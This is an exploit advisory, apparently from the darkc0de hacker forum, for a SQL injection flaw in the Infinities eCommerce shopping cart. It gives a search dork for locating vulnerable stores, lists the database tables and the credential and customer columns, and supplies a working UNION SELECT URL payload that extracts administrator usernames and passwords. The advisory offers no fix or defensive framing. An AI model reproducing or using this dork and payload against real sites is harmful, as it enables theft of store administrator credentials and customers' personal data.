Infinities eCommerce Web Hosting and Shopping Cart Solution suffer from a remote SQL injection vulnerability.
dcdf12f5f82bebd42eb7e70b6a8766ef74e3a110a946514b3ffa6de9c9754c30
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# d3hydr8 - rsauron - baltazar - low1z - houbysoft - beenu #
# and all darkc0de members #
################################################################
#
# Author: p47r1ck
#
# Home : www.darkc0de.com
#
# Email : P47r1ckro[at]gmail[dot]com
#
# Share the c0de!
#
################################################################
#
# Vendor: http://www.infinities.com/
#
# ©1997-2008 Infinities eCommerce Web Hosting
# and Shopping Cart Solution
#
################################################################
#
# Dork: intext:"e-commerce powered by Infinities.com"
#
# Their product, Online Store and Shopping Cart
# suffers of a Normal SQLi
#
# MySQL Version 4
# Table name : config,administration,customers,orders
# Columns found for administration : username,password
# Columns found for customers : email,password,ipaddress,lastname,phone
#
#
#
# Example:
#
# Http://www.infinities.com/onlinestore/detail.cfm?ID=CA-ST825S&storeid=1
# union+select+all+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13
# 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,
# 34,35,36,37,38,39,40,41,42,43,44,45+from+administration--
#
#
################################################################
# Vuln Discovered 16 May 2009